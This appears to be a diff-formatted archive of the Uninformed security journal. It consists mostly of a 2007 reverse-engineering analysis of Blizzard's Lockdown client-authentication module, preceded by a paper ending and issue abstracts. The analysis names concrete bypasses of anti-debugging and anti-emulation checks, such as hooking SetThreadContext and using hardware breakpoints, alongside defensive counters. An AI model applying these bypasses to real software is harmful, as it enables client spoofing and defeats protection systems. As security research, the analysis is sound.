|
||||
Traditionally, Windows security has been a user-based model, where all
|
||||
processes that execute as a user were considered equally trusted. Windows
|
||||
Vista and Windows Server 2008 are the first steps towards changing this model
|
||||
to support the concept of an untrusted process (as opposed to an untrusted
|
||||
user). While this has the potential to significantly benefit end user
|
||||
security, as is the case with Internet Explorer Protected Mode, there are
|
||||
bound to be bumps along the way. Writing an integrity level broker process is
|
||||
difficult. It is very easy to make simple mistakes that compromise the
|
||||
security of the integrity level mechanism, as the appinfo issue highlights.
|
||||
The author would like to think that by shedding light on this type of
|
||||
programming error, future issues of a similar vein may be prevented before
|
||||
they reach end users.
|
1383
uninformed/8.4.txt
Normal file
File diff suppressed because it is too large
1822
uninformed/8.5.txt
Normal file
File diff suppressed because it is too large
1234
uninformed/8.6.txt
Normal file
File diff suppressed because it is too large
22
uninformed/8.txt
Normal file
|
@ -0,0 +1,22 @@
|
|||
Engineering in Reverse
|
||||
An Objective Analysis of the Lockdown Protection System for Battle.net
|
||||
Skywing
|
||||
Near the end of 2006, Blizzard deployed the first major update to the version check and client software authentication system used to verify the authenticity of clients connecting to Battle.net using the binary game client protocol. This system had been in use since just after the release of the original Diablo game and the public launch of Battle.net. The new authentication module (Lockdown) introduced a variety of mechanisms designed to raise the bar with respect to spoofing a game client when logging on to Battle.net. In addition, the new authentication module also introduced run-time integrity checks of client binaries in memory. This is meant to provide simple detection of many client modifications (often labeled "hacks") that patch game code in-memory in order to modify game behavior. The Lockdown authentication module also introduced some anti-debugging techniques that are designed to make it more difficult to reverse engineer the module. In addition, it includes several checks that are designed to make it difficult to simply load and run the Blizzard Lockdown module from the context of an unauthorized, non-Blizzard-game process. After all, if an attacker can simply load and run the Lockdown module in his or her own process, it becomes trivially easy to spoof the game client logon process, or to allow a modified game client to log on to Battle.net successfully. However, like any protection mechanism, the new Lockdown module is not without its flaws, some of which are discussed in detail in this paper.
|
||||
html | pdf | txt
|
||||
|
||||
Exploitation Technology
|
||||
ActiveX - Active Exploitation
|
||||
warlord
|
||||
This paper provides a general introduction to the topic of understanding security vulnerabilities that affect ActiveX controls. A brief description of how ActiveX controls are exposed to Internet Explorer is given along with an analysis of three example ActiveX vulnerabilities that have been previously disclosed.
|
||||
html | pdf | txt
|
||||
|
||||
Context-keyed Payload Encoding
|
||||
I)ruid
|
||||
A common goal of payload encoders is to evade a third-party detection mechanism which is actively observing attack traffic somewhere along the route from an attacker to their target, filtering on commonly used payload instructions. The use of a payload encoder may be easily detected and blocked as well as opening up the opportunity for the payload to be decoded for further analysis. Even so-called keyed encoders utilize easily observable, recoverable, or guessable key values in their encoding algorithm, thus making decoding on-the-fly trivial once the encoding algorithm is identified. It is feasible that an active observer may make use of the inherent functionality of the decoder stub to decode the payload of a suspected exploit in order to inspect the contents of that payload and make a control decision about the network traffic. This paper presents a new method of keying an encoder which is based entirely on contextual information that is predictable or known about the target by the attacker and constructible or recoverable by the decoder stub when executed at the target. An active observer of the attack traffic however should be unable to decode the payload due to lack of the contextual keying information.
|
||||
html | pdf | txt
|
||||
|
||||
Improving Software Security Analysis using Exploitation Properties
|
||||
skape
|
||||
Reliable exploitation of software vulnerabilities has continued to become more difficult as formidable mitigations have been established and are now included by default with most modern operating systems. Future exploitation of software vulnerabilities will rely on either discovering ways to circumvent these mitigations or uncovering flaws that are not adequately protected. Since the majority of the mitigations that exist today lack universal bypass techniques, it has become more fruitful to take the latter approach. It is in this vein that this paper introduces the concept of exploitation properties and describes how they can be used to better understand the exploitability of a system irrespective of a particular vulnerability. Perceived exploitability is of utmost importance to both an attacker and to a defender given the presence of modern mitigations. The ANI vulnerability (MS07-017) is used to help illustrate these points by acting as a simple example of a vulnerability that may have been more easily identified as code that should have received additional scrutiny by taking exploitation properties into consideration.
|
||||
html | pdf | txt
|
||||
|
639
uninformed/9.1.txt
Normal file
|
@ -0,0 +1,639 @@
|
|||
An Objective Analysis of the Lockdown Protection System for Battle.net
|
||||
12/2007
|
||||
Skywing
|
||||
skywing@valhallalegends.com
|
||||
|
||||
Abstract
|
||||
|
||||
Near the end of 2006, Blizzard deployed the first major update to the version
|
||||
check and client software authentication system used to verify the authenticity
|
||||
of clients connecting to Battle.net using the binary game client protocol. This
|
||||
system had been in use since just after the release of the original Diablo
|
||||
game and the public launch of Battle.net. The new authentication module
|
||||
(Lockdown) introduced a variety of mechanisms designed to raise the bar with
|
||||
respect to spoofing a game client when logging on to Battle.net. In addition,
|
||||
the new authentication module also introduced run-time integrity checks of
|
||||
client binaries in memory. This is meant to provide simple detection of many
|
||||
client modifications (often labeled "hacks") that patch game code in-memory in
|
||||
order to modify game behavior. The Lockdown authentication module also
|
||||
introduced some anti-debugging techniques that are designed to make it more
|
||||
difficult to reverse engineer the module. In addition, it includes several checks that
|
||||
are designed to make it difficult to simply load and run the Blizzard
|
||||
Lockdown module from the context of an unauthorized, non-Blizzard-game
|
||||
process. After all, if an attacker can simply load and run the Lockdown
|
||||
module in his or her own process, it becomes trivially easy to spoof the game
|
||||
client logon process, or to allow a modified game client to log on to
|
||||
Battle.net successfully. However, like any protection mechanism, the new
|
||||
Lockdown module is not without its flaws, some of which are discussed in
|
||||
detail in this paper.
|
||||
|
||||
1) Introduction
|
||||
|
||||
The Lockdown module is a part of several schemes that attempt to make it
|
||||
difficult to connect to Battle.net with a client that is not a "genuine"
|
||||
Blizzard game. For the purposes of this paper, the author considers both
|
||||
modified/"hacked" Blizzard game clients, and third-party client software,
|
||||
known as "emubots", as examples of Battle.net clients that are not genuine
|
||||
Blizzard games. The Battle.net protocol also incorporates a number of schemes
|
||||
(such as a proprietary mechanism for presenting a valid CD-Key for inspection
|
||||
by Battle.net, and a non-standard derivative of the SRP password exchange
|
||||
protocol for account logon) that by virtue of being obscure and undocumented
|
||||
make it non-trivial for an outsider to successfully log a non-genuine client
|
||||
on to Battle.net.
|
||||
|
||||
Prior to the launch of the Lockdown module, a different system took its place and
|
||||
filled the role of validating client software versions. The previous system
|
||||
was resistant to replay attacks (caveat: a relatively small pool of challenge
|
||||
response values maintained by servers makes it possible to use replay attacks
|
||||
after observing a large number of successful logon attempts) by virtue of the
|
||||
use of a dynamically-supplied checksum formula that is sent to clients (a
|
||||
challenge, in effect). This formula was then interpreted by the predecessor
|
||||
to the Lockdown module, otherwise known as the "ver" or "ix86ver" module,
|
||||
and used to create a one-way hash of several key game client binaries. The
|
||||
resulting response would then be sent back to the game server for verification,
|
||||
with an invalid response resulting in the client being denied access to
|
||||
Battle.net.
|
||||
|
||||
While the "ver" module provides some inherent resistance to some
|
||||
types of non-genuine clients (such as those that modify Blizzard game binaries
|
||||
on disk), it does little to stop in-memory modifications to Blizzard game
|
||||
clients. Additionally, there is very little to stop an attacker from creating
|
||||
their own client software (an "emubot") that implements the "ver" module's
|
||||
checksum scheme, either by calling "ver" directly or through the use of a
|
||||
third-party, reverse-engineered implementation of the algorithm implemented in
|
||||
the "ver" module. It should be noted that there exists one basic protection
|
||||
against third party software calling the "ver" module directly; the "ver"
|
||||
series of modules are designed to always run part of the version check hash on
|
||||
the caller process image (as returned by the Win32 API GetModuleFileNameA).
|
||||
This poses a minor annoyance for third party programs. In order to bypass
|
||||
this protection, however, one need only hook GetModuleFileNameA and fake the
|
||||
result returned to the "ver" module.
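
The bypass can be sketched with a toy model. This is an illustration only,
written in Python rather than against the Win32 API: the file table, the
paths, and every function name are hypothetical, and SHA-1 over the challenge
plus the image is a stand-in for the server-supplied checksum formula, which
is not reproduced here.

```python
import hashlib

# Hypothetical stand-ins for files on disk: path -> contents.
FILES = {
    r"C:\Games\game.exe": b"genuine game image",
    r"C:\Bots\emubot.exe": b"third-party client image",
}


class Process:
    def __init__(self, image_path):
        self.image_path = image_path

    def get_module_file_name(self):
        # Stand-in for GetModuleFileNameA on the calling process image.
        return self.image_path


def ver_check(process, challenge):
    """Toy version check: hash the challenge with the caller's image."""
    image = FILES[process.get_module_file_name()]
    return hashlib.sha1(challenge + image).hexdigest()


def hook_module_file_name(process, fake_path):
    # Replace the lookup on this one process object, as an API hook would.
    process.get_module_file_name = lambda: fake_path
```

Before the hook is installed, the third-party process produces a response
that differs from the genuine client's; afterwards the two responses match for
the same challenge.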
|
||||
|
||||
Given the existing "ver" module's capabilities, the Lockdown module
|
||||
represents a major step forward in the vein of assuring that only genuine
|
||||
Blizzard client software can log on to Battle.net as a game client. The
|
||||
Lockdown module is a first in many respects for Blizzard with respect to
|
||||
releasing code that actively attempts to thwart analysis via a debugger
|
||||
(and actively attempts to resist being called in a foreign process with
|
||||
non-trivial mechanisms).
|
||||
|
||||
Despite the work put into the Lockdown module, however, it has proven perhaps
|
||||
less effective than originally hoped (though the author cannot state the
|
||||
definitive expectations for the Lockdown module, it can be assumed that a
|
||||
"hacking life" of more than several days was an objective of the Lockdown
|
||||
module). This paper discusses the various major protection systems embedded
|
||||
into the Lockdown module and associated authentication system, potential
|
||||
attacks against them, and technical counters to these attacks that Blizzard
|
||||
could take in a future release of a new version check/authentication module.
|
||||
|
||||
Part of the problem the developers of the Lockdown module faced relates to
|
||||
constraints on the environment in which the module operates. The author has
|
||||
derived the following constraints currently in place for the module:
|
||||
|
||||
1. The server portion of the authentication system is likely static and does not
|
||||
generate challenge/response values in real time. Instead, a pool of possible
|
||||
values appears to be pregenerated and configured on the server.
|
||||
2. The module needs to work on all operating systems supported by all Blizzard
|
||||
games, which spans the gamut from Windows 9x to Windows Vista x64. Note that
|
||||
there are provisions for different architectures, such as Mac OS, to use a
|
||||
different system than Windows architectures.
|
||||
3. The module needs to work on all versions of all Blizzard Battle.net games,
|
||||
including previous versions. This is due to the fact that the module plays
|
||||
an integral part in Battle.net's software version control system, and thus
|
||||
is used on old clients before they can be upgraded.
|
||||
4. Legitimate users should not see a high incidence of false positives, and it
|
||||
is not desirable for false positives to result in automated permanent action
|
||||
against legitimate users (such as account closure).
|
||||
|
||||
As an aside, in the author's opinion, the version check and authentication
|
||||
system is not intended as a copy protection system for Battle.net, as it does
|
||||
nothing to discourage additional copies of genuine Blizzard game software from
|
||||
being used on Battle.net. In essence, the version check and authentication
|
||||
system is a system that is designed to ensure that only copies of the
|
||||
genuine Blizzard game software can log on to Battle.net. Copy protection
|
||||
measures on Battle.net are provided through the CD-Key feature, wherein the
|
||||
server requires that a user has a valid (and unique) CD-Key (for applicable
|
||||
products).
|
||||
|
||||
2) Protection Schemes of the Lockdown Module
|
||||
|
||||
As a stark contrast to the old "ver" module, the Lockdown module includes a
|
||||
number of active defense mechanisms designed to significantly strengthen the
|
||||
module's resistance to attack (including either analysis or being tricked into
|
||||
providing a "good" response to a challenge to an untrusted process).
|
||||
|
||||
The protection schemes in the Lockdown module can be broken up into several
|
||||
categories:
|
||||
|
||||
1. Mechanisms to thwart analysis of the Lockdown module itself and the secret
|
||||
algorithm it implements (anti-debugging/anti-reverse-engineering).
|
||||
2. Mechanisms to thwart the successful use of Lockdown in a hostile process to
|
||||
generate a "good" response to a challenge from Battle.net (anti-emubot, and
|
||||
by extension anti-hack, where "anti-hack" denotes a counter to modifications
|
||||
of an otherwise genuine Blizzard game client).
|
||||
3. Mechanisms to thwart modifications to an otherwise-genuine Blizzard game
|
||||
client that is attempting to log on to Battle.net (anti-hack).
|
||||
|
||||
In addition, the Lockdown module is also responsible for implementing a
|
||||
reasonable facsimile of the original function of the "ver" module; that is, to
|
||||
provide a way to authoritatively validate the version of a genuine Blizzard
|
||||
game client, for the purposes of software version control (e.g. the deployment of
|
||||
the correct software updates/patches to old versions of genuine Blizzard game
|
||||
clients connecting to Battle.net).
|
||||
|
||||
In this vein, the following protection schemes are present in the Lockdown
|
||||
module and associated authentication system:
|
||||
|
||||
2.1) Clearing the Processor Debug Registers
|
||||
|
||||
The x86 family of processors includes a set of special registers that are
|
||||
designed to assist in the debugging of programs. These registers allow a user
|
||||
to cause the processor to stop when a particular memory location is accessed,
|
||||
as an instruction fetch, as a data read, or as a data write. This debugging
|
||||
facility allows a user (debugger) to set up to four different virtual addresses
|
||||
that will trap execution when referenced in a particular way. The use of these
|
||||
debug registers to set traps on specific locations is sometimes known as
|
||||
setting a "hardware breakpoint", as the processor's dedicated debugging
|
||||
support (in-hardware) is being utilized.
|
||||
|
||||
Due to their obvious utility to anyone attempting to analyze or reverse
|
||||
engineer the Lockdown module, the module actively attempts to disable this
|
||||
debugging aid by explicitly zeroing the contents of the key debug registers in
|
||||
the context of the thread executing the Lockdown module's version check
|
||||
call, CheckRevision. All the requisite debug registers are cleared immediately
|
||||
after the call to the CheckRevision routine in the Lockdown module is made.
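
For readers unfamiliar with the debug registers, the following sketch models
how a hardware breakpoint is armed and what zeroing the registers undoes. It
is a Python model of the x86 register layout (DR0-DR3 hold addresses, DR7
holds the enable, access type, and length fields), not code taken from the
Lockdown module; the helper names and the addresses used with them are
hypothetical, and the text does not say exactly which registers the module
zeroes.

```python
# Access types (R/W field of DR7) and lengths (LEN field of DR7).
RW_EXECUTE, RW_WRITE, RW_READ_WRITE = 0b00, 0b01, 0b11
LEN_1, LEN_2, LEN_4 = 0b00, 0b01, 0b11


def new_debug_registers():
    # DR0-DR3 hold addresses; DR7 holds the enable and condition bits.
    return {"dr0": 0, "dr1": 0, "dr2": 0, "dr3": 0, "dr7": 0}


def set_hardware_breakpoint(regs, slot, address, rw, length):
    """Arm one of the four breakpoint slots (0-3) in the register model."""
    if slot not in range(4):
        raise ValueError("only four breakpoint slots exist")
    regs["dr%d" % slot] = address
    regs["dr7"] |= 1 << (slot * 2)              # local enable bit L<slot>
    regs["dr7"] |= rw << (16 + slot * 4)        # R/W<slot> field
    regs["dr7"] |= length << (18 + slot * 4)    # LEN<slot> field
    return regs


def clear_debug_registers(regs):
    # What a self-protecting module might do: zero every register.
    for name in regs:
        regs[name] = 0
    return regs


def armed_slots(regs):
    # A slot is armed if its local or global enable bit is set in DR7.
    return [s for s in range(4) if regs["dr7"] & (0b11 << (s * 2))]
```

Once clear_debug_registers has run, armed_slots reports nothing, so a
debugger's breakpoints in that thread silently stop firing until they are set
again.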
|
||||
|
||||
This protection mechanism constitutes an anti-debugging scheme.
|
||||
|
||||
2.2) Memory Checksum Performed on the Lockdown Module
|
||||
|
||||
The Lockdown module, contrary to the behavior of its predecessor, implements
|
||||
a checksum of several key game executable files in-memory instead of on-disk.
|
||||
In addition to the checksum over certain game executables, the Lockdown
|
||||
module includes itself in the list of modules to be checksummed. This provides
|
||||
several immediate benefits:
|
||||
|
||||
1. Attempts to set conventional software breakpoints on routines inside the
|
||||
Lockdown module will distort the result of the operation, frustrating
|
||||
reverse engineering attempts. This is due to the fact that so-called
|
||||
software breakpoints are implemented by patching the instruction at the
|
||||
target location with a special instruction (typically `int 3') that causes
|
||||
the processor to break into the debugger. The alteration to the module's
|
||||
executable code in memory causes the checksum to be distorted, as the `int 3'
|
||||
opcode is checksummed instead of the original opcode.
|
||||
2. Attempts to bypass other protection mechanisms in the Lockdown module are
|
||||
made more difficult, as an untrusted process that is attempting to cause the
|
||||
Lockdown module to produce correct results via patching out certain other
|
||||
protection mechanisms will, simply by virtue of altering Lockdown code
|
||||
in-memory, inadvertently alter the end result of the checksum operation. The
|
||||
success of this aspect of the memory checksum protection is related to the
|
||||
fact that the Lockdown module attempts to disable hardware breakpoints as
|
||||
well. These two protection mechanisms thus complement each other in a strong
|
||||
fashion, such that a naive attempt to compromise one of the protection
|
||||
schemes would usually be detected by the other scheme. In effect, the result
|
||||
is a rudimentary "defense in depth" approach to software protection schemes
|
||||
that is the hallmark of most relatively successful protection schemes.
|
||||
3. The inclusion of the version check module itself in the result of the output
|
||||
of the checksum is entirely new to the version check and client
|
||||
authentication system, and as such poses an additional, unexpected "speed
|
||||
bump" to persons attempting to reimplement the Lockdown algorithm in their
|
||||
own code.
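
The effect of a software breakpoint on a self-inclusive checksum can be shown
with a small model. This is a sketch under stated assumptions: SHA-1 over the
concatenated images is a stand-in for the real Lockdown checksum, and the
module names, byte contents, and function names are hypothetical. Only the use
of a one-byte `int 3' patch (opcode 0xCC) reflects the mechanism in the text.

```python
import hashlib

INT3 = 0xCC  # one-byte x86 breakpoint opcode


def checksum_modules(modules):
    """Hash every module image in a fixed order, Lockdown included."""
    digest = hashlib.sha1()
    for name in sorted(modules):
        digest.update(modules[name])
    return digest.hexdigest()


def set_software_breakpoint(image, offset):
    # A debugger overwrites the first byte of the target instruction.
    patched = bytearray(image)
    patched[offset] = INT3
    return bytes(patched)
```

Patching a single byte of the checksummed module is enough to change the
digest, so a response computed while a software breakpoint is in place no
longer matches the expected value.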
|
||||
|
||||
This protection mechanism has characteristics of an anti-debugging,
|
||||
anti-hack, and anti-emubot system.
|
||||
|
||||
2.3) Hardcoding of Module Base Addresses
|
||||
|
||||
As mentioned previously, the Lockdown module now implements a checksum over
|
||||
game executables in-memory instead of on-disk. Taking advantage of this
|
||||
change, the Lockdown module can hardcode the base address of the main process
|
||||
executable at the default address of 0x00400000. This is safe because no
|
||||
Blizzard game executable includes base relocation information, and as a result
|
||||
will never change from this base address.
|
||||
|
||||
By virtue of hardcoding this address, it becomes more difficult for an
|
||||
untrusted process to successfully call the Lockdown module. Unless the
|
||||
programmer is particularly clever, he or she may not notice that the Lockdown
|
||||
module is not actually performing a checksum over the main executable for the
|
||||
desired Blizzard game, but instead the main executable of the untrusted process
|
||||
(the default address for executables in the Microsoft linker program is the
|
||||
same 0x00400000 value used in Blizzard's main executables comprising their
|
||||
game clients).
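
A toy model makes the pitfall concrete. This is a sketch only: the address
space is represented as a Python dictionary from base address to image bytes,
SHA-1 is a stand-in for the real checksum, and the function name and the
secondary address 0x10000000 are hypothetical. Only the 0x00400000 base comes
from the text.

```python
import hashlib

HARDCODED_BASE = 0x00400000  # default image base named in the text


def checksum_main_image(address_space):
    """Hash whatever image is mapped at the hardcoded base address."""
    return hashlib.sha1(address_space[HARDCODED_BASE]).hexdigest()
```

If a third-party process maps the game executable at some other address, its
own main image still occupies 0x00400000, so the checksum is silently taken
over the wrong bytes and the response differs from that of a genuine client.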
|
||||
|
||||
While it is possible to change the base address of a program at link-time,
|
||||
which could be done by a third-party process in an attempt to make it possible
|
||||
to map the desired Blizzard main executable at the 0x00400000 address, it is
|
||||
difficult to pull this off under Windows NT. This is because the 0x00400000
|
||||
address is low in the address space, and the default behavior of the kernel's
|
||||
memory manager is to find new addresses for memory allocations starting from
|
||||
the bottom of the address space. This means that in virtually all cases, a
|
||||
virgin Win32 process will already have an allocation (usually one of the shared
|
||||
sections used for communication with CSRSS in the author's experience) that is
|
||||
overlapping the address range required by the Lockdown module for the main
|
||||
executable of the Blizzard game for which a challenge response is being
|
||||
computed. While it is possible to change this behavior in the Windows NT
|
||||
memory manager and cause allocations to start at the top of the address space
|
||||
and search downwards, this is not the default configuration and is also a
|
||||
relatively obscure kernel option. The fact that all users would need to
|
||||
be reconfigured to change the default allocation search preference for an
|
||||
untrusted process to typically successfully map the desired Blizzard game
|
||||
executable makes this approach relatively painful for a would-be attacker.
|
||||
|
||||
The Lockdown module also ensures that the return value of the
|
||||
GetModuleHandleA(0) Win32 API corresponds to 0x00400000, indicating that the
|
||||
main process image is based at 0x00400000 as far as the loader is concerned.
|
||||
The restriction on the base address of the game main executable module has the
|
||||
unfortunate side effect that it will not be possible to take advantage of
|
||||
Windows Vista's ASLR attack surface reduction capabilities, negatively
|
||||
impacting the resistance of Blizzard games to certain classes of exploitation
|
||||
that might impact the security of users.
|
||||
|
||||
This protection mechanism is primarily considered to be an anti-emubot scheme,
|
||||
as it is designed to prevent an untrusted process from successfully
|
||||
calling the Lockdown module.
|
||||
|
||||
2.4) Video Memory Checksum
|
||||
|
||||
Another previously nonexistent component to the version check algorithm that is
|
||||
introduced by the Lockdown module is a checksum over the video memory of the
|
||||
process calling the Lockdown module. At the point in time where the module
|
||||
is invoked by the Blizzard game, the portion of video memory checksummed should
|
||||
correspond to part of the "Battle.net" banner in the log on screen for the
|
||||
Blizzard game. The Lockdown module is currently only implemented for
|
||||
so-called "legacy" game clients, otherwise known as clients that use Battle.snp
|
||||
and the Storm Network Provider system for multiplayer access. This includes
|
||||
all Battle.net-capable Blizzard games ranging from Diablo I to Starcraft and
|
||||
Warcraft II: BNE. Later games, such as Diablo II, are not supported by the
|
||||
Lockdown module.
|
||||
|
||||
This represents an additional non-trivial challenge to a would-be attacker.
|
||||
Although the contents of the video memory to be checksummed are static, the way
|
||||
that the Lockdown module retrieves the video memory pointers is through an
|
||||
obfuscated call to several internal Storm routines (SDrawSelectGdiSurface,
|
||||
SDrawLockSurface, and SDrawUnlockSurface) that rely on a non-trivial amount of
|
||||
internal state initialized by the Blizzard game during startup. This makes the
|
||||
use of the internal Storm routines unlikely to simply work "out of the box" in
|
||||
an untrusted process that has not gone to all the trouble to initialize the
|
||||
Storm graphics subsystem and draw the appropriate data on the Storm video
|
||||
surfaces.
|
||||
|
||||
This protection mechanism is primarily considered to be an anti-emubot scheme,
|
||||
as it is designed to prevent an untrusted process from successfully
|
||||
calling the Lockdown module.
|
||||
|
||||
2.5) Multiple Flavors of the Lockdown Module
|
||||
|
||||
The original "ver" module scheme pioneered a system wherein there were multiple
|
||||
downloadable flavors of the version check module to be used by a client. The
|
||||
Battle.net server sends the client a tuple of (version check module filename,
|
||||
checksum formula and initialization parameters, version check module timestamp)
|
||||
that is used in order to version (and download, if necessary) the latest copy
|
||||
of the version check module. This mechanism provides for the possibility that
|
||||
the Battle.net server could support multiple "flavors" of version check module
|
||||
that could be distributed to clients in order to increase the amount of work
|
||||
required by anyone seeking to reimplement the version check and authentication
|
||||
system.
|
||||
|
||||
The original "ver" module and associated authentication scheme in fact utilized
|
||||
such a scheme of multiple "ver" modules, and the Lockdown scheme expands upon
|
||||
this trend. In the original system, there were 8 possible modules to choose
|
||||
from; the Lockdown system, by contrast, expands this to a set of 20
|
||||
possibilities. However, the version check modules in both systems are still
|
||||
very similar to one another. In both systems, each module has its own unique
|
||||
key (a 32-bit value in the "ver" system, and a 64-bit value in the Lockdown
|
||||
system) that is used to influence the result of the version check checksum (it
|
||||
should be noted that in the Lockdown system, the actual Lockdown module
|
||||
itself is in essence a second "key", as the added checksum over the module
|
||||
represents an additional adjustment to the final checksum result that changes
|
||||
with each Lockdown module). This single difference is disguised by other
|
||||
minor, superficial alterations to each module flavor; there are slight
|
||||
differences by which module base addresses are retrieved, for instance, and
|
||||
there are also other superficial differences that relate to differences like
|
||||
code being moved between functions or functions being re-arranged in the final
|
||||
binary in order to prevent a simple "diff" of two Lockdown modules from
|
||||
revealing the functional differences between the two
|
||||
modules.
|
||||
|
||||
This protection mechanism is perhaps best classed as an anti-analysis scheme,
|
||||
as it attempts to create more work for anyone attempting to reverse engineer
|
||||
the authentication system as a whole.
|
||||
|
||||
2.6) Authenticity Check Performed on Lockdown Module Caller
|
||||
|
||||
An additional new protection scheme introduced in the Lockdown module is a
|
||||
rudimentary check on the authenticity of the caller of the module's export,
|
||||
the CheckRevision routine. Specifically, the module attempts to ascertain
|
||||
whether the return address of the call to the CheckRevision routine points to a
|
||||
code location within the Battle.snp module. If the return pointer for the call
|
||||
to CheckRevision is not within the expected range, then an error is
|
||||
deliberately introduced into the checksum calculations, ultimately resulting in
|
||||
the result returned by the Lockdown module becoming invalidated.
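
The caller check described above amounts to a range test on the return address. The following is a minimal sketch, assuming a hypothetical base address and size for Battle.snp and an arbitrary placeholder constant for the deliberately introduced error; none of these values come from the actual module.

```python
def return_address_in_module(return_address, module_base, module_size):
    """True if the return address lies inside [base, base + size)."""
    return module_base <= return_address < module_base + module_size


def check_revision_result(checksum, return_address, module_base, module_size):
    """Return the checksum, silently corrupted if the caller looks foreign.

    The XOR constant is a placeholder; the real perturbation is not
    documented here.
    """
    if not return_address_in_module(return_address, module_base, module_size):
        checksum ^= 0xDEADBEEF
    return checksum & 0xFFFFFFFF
```

Corrupting the result rather than returning an explicit failure means the untrusted caller receives a plausible-looking value and only learns of the problem when the server rejects it.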
|
||||
|
||||
3) Attacks (and Counter-Attacks) on the Lockdown System
|
||||
|
||||
Though the Lockdown module introduces a number of new defensive mechanisms
|
||||
that attempt to thwart would-be attackers, these systems are far from
|
||||
fool-proof. There are a number of ways that these defensive systems could be
|
||||
attacked (or subverted) by a would-be attacker who wishes to pass the version
|
||||
and authentication check in the context of a non-genuine client for purposes of
|
||||
logging on to Battle.net. In addition, there are also a variety of different
|
||||
ways by which these proposed attacks could be thwarted in a future update to
|
||||
the version check and authentication system.
|
||||
|
||||
3.1) Interception of SetThreadContext
|
||||
|
||||
As previously described, the Lockdown modules attempt to disable the use of
|
||||
the processor's complement of debug registers in order to make it difficult
|
||||
to utilize so-called hardware breakpoints during the process of reverse
|
||||
engineering or analyzing a Lockdown module. This scheme is, at present,
|
||||
relatively easily compromised, however.
|
||||
|
||||
There are several possible attacks that could be used:
|
||||
|
||||
1. Hook the SetThreadContext API and block attempts to disable debug registers
|
||||
(programmatic).
|
||||
2. Patch the import address table entry for SetThreadContext in the Lockdown
|
||||
module to point to a custom routine that does nothing (programmatic).
|
||||
3. Patch the Lockdown module instruction code to not call SetThreadContext in
|
||||
the first place (programmatic). However, this approach is considered to
|
||||
be generally untenable, due to the memory checksum protection scheme.
|
||||
4. Set a conditional breakpoint on `kernel32!SetThreadContext' that re-applies
|
||||
the hardware breakpoint state after the call, or simply alters execution
|
||||
flow to immediately return (debugger).
|
||||
|
||||
Depending on whether the attacker wants to make programmatic alterations to the
|
||||
behavior of the Lockdown module via hardware breakpoints, or simply wishes
|
||||
to observe the behavior of the module in the debugger unperturbed, there are
|
||||
several options available.
|
||||
|
||||
The suggested counters include techniques such as the following:
|
||||
|
||||
1. Verify that the debug registers were really cleared. However, this could
|
||||
simply be patched out as well. More subtle would be to include the value
|
||||
of several debug registers in the checksum calculations, but this would also
|
||||
be fairly obvious to attackers due to the fact that debug registers cannot be
|
||||
directly accessed from user mode and require a call to Get/SetThreadContext,
|
||||
or the underlying NtGet/SetContextThread system calls.
|
||||
2. Include additional calls to disable debug register usage in different
|
||||
locations within the Lockdown module. To be most effective, these would
|
||||
need to be inlined and use different means to set the debug register state.
|
||||
For example, one location could use a direct import, another could use a
|
||||
GetProcAddress dynamic import, a third could manually walk the EAT of
|
||||
kernel32 to find the address of SetThreadContext, a fourth could make
|
||||
a call to NtSetContextThread in ntdll, and a fifth could disassemble the
|
||||
opcodes comprising NtSetContextThread, determine the system call ordinal,
|
||||
and make the system call directly (e.g. via `int 2e'). The goal here is to
|
||||
add additional work and eliminate "single points of failure" from the
|
||||
perspective of an attacker seeking to disable the anti-debugging feature.
|
||||
Note that the direct system call approach will require additional work in
|
||||
order to function under Wow64 (e.g. x64 computers running native Windows
|
||||
x64).
|
||||
3. Verify that all IAT entries corresponding to kernel32 actually point to the
|
||||
same module in-memory. This is risky, though, as in some cases (such as when
|
||||
the Microsoft application compatibility layer module is in use), these APIs
|
||||
may be legitimately detoured.
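
The first counter above (folding debug register values into the checksum) can be sketched as follows. This is a toy model only: the mixing function is invented for illustration and is not the Lockdown checksum, and the context is represented as a plain dictionary rather than a CONTEXT structure filled in by GetThreadContext.

```python
DEBUG_REGISTERS = ("Dr0", "Dr1", "Dr2", "Dr3", "Dr7")
MASK32 = 0xFFFFFFFF


def fold_debug_registers(checksum, context):
    """Mix debug register values into a running 32-bit checksum."""
    for name in DEBUG_REGISTERS:
        # Multiplying by an odd constant is invertible modulo 2**32, so a
        # difference introduced by one register is never cancelled by the
        # multiplication itself.
        checksum = (checksum * 31 + context[name]) & MASK32
    return checksum
```

With all registers cleared, the client and the server arrive at the same value. An active hardware breakpoint changes the result without any visible compare-and-branch for an attacker to patch out, although the call that fetches the thread context remains easy to spot.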
|
||||
|
||||
3.2) Use of Hardware Breakpoints
|
||||
|
||||
Assuming an attacker can compromise the anti-debugging protection scheme, then
|
||||
he or she is free to make clever use of hardware breakpoints to disable other
|
||||
protection systems (such as hardcoded base addresses of modules, checks on the
|
||||
authenticity of a CheckRevision caller, and so forth) by setting execute fetch
|
||||
breakpoints on choice code locations. Then, the attacker could simply alter
|
||||
the execution context when the breakpoints are hit, in order to bypass other
|
||||
protection mechanisms. For example, an attacker could set a read breakpoint
|
||||
on the hardcoded base address for the main process image inside the Lockdown
|
||||
module, and change the base address accordingly. The attacker would also
|
||||
have to patch GetModuleHandleA in order to complete this example attack.
|
||||
|
||||
Suggested counters to attacks based on hardware breakpoints include:
|
||||
|
||||
1. Validation of the vectored exception handler chain, which might be used to
|
||||
intercept STATUS_SINGLE_STEP exceptions when hardware breakpoints are hit.
|
||||
This is risky, as there are legitimate reasons for there to be "foreign"
|
||||
vectored exception handlers, however.
|
||||
2. Checks to stop debuggers from attaching to the process, period. This is not
|
||||
considered to be a viable solution since there are a number of legitimate
|
||||
reasons for a debugger to be attached to a process, many of which may
|
||||
be unknown completely to the end user (such as profilers, crash control and
|
||||
reporting systems, and other types of security software). Attempting to
|
||||
block debuggers may also prevent the normal operation of Windows Error
|
||||
Reporting or a preconfigured JIT debugger in the event of a game crash,
|
||||
depending on the implementation used. Ways of detecting debuggers include
|
||||
calls to IsDebuggerPresent, NtQueryInformationProcess(...ProcessDebugPort..),
|
||||
checks against NtCurrentPeb()->BeingDebugged, and so forth.
|
||||
3. Duplication of checks (perhaps in slightly altered forms) throughout the
|
||||
execution of the checksum implementation. It is important for this
|
||||
duplication to be inline as much as possible in order to eliminate single
|
||||
points of failure that could be used to short-circuit protection schemes by
|
||||
an attacker.
|
||||
4. Strengthening of the anti-debugging mechanism, as previously described.
|
||||
|
||||
3.3) Main Process Image Module Base Address Restriction
|
||||
|
||||
An attacker seeking to execute the Lockdown module in an untrusted process
|
||||
would need to bypass the restrictions on the base address of the main process
|
||||
image. The most likely approach to this would be a combination attack, whereby
|
||||
the attacker would use something like a set of hardware breakpoints to alter
|
||||
